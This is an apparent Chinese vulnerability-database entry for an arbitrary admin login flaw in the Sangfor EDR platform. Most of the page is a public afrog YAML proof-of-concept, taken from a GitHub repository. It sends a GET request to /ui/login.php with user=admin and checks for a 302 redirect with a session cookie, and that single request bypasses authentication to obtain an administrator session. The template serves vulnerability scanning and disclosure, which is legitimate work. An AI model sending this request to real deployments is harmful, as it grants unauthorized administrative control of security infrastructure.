sangfor-edr-arbitrary-admin-login: sangfor-edr-arbitrary-admin-login

日期: 2025-09-01 | 影响软件: sangfor edr | POC: 已公开

漏洞描述

终端检测响应平台EDR

PoC代码[已公开]

id: sangfor-edr-arbitrary-admin-login

info:
    name: sangfor-edr-arbitrary-admin-login
    author: hilson
    severity: high
    description: 终端检测响应平台EDR
    reference:
        - https://mp.weixin.qq.com/s/6aUrXcnab_EScoc0-6OKfA

rules:
    r0:
        request:
            method: GET
            path: /ui/login.php?user=admin
            follow_redirects: false
        expression: response.status == 302 && response.body.bcontains(b"/download/edr_installer_") && response.headers["set-cookie"] != ""
expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/sangfor-edr-arbitrary-admin-login.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐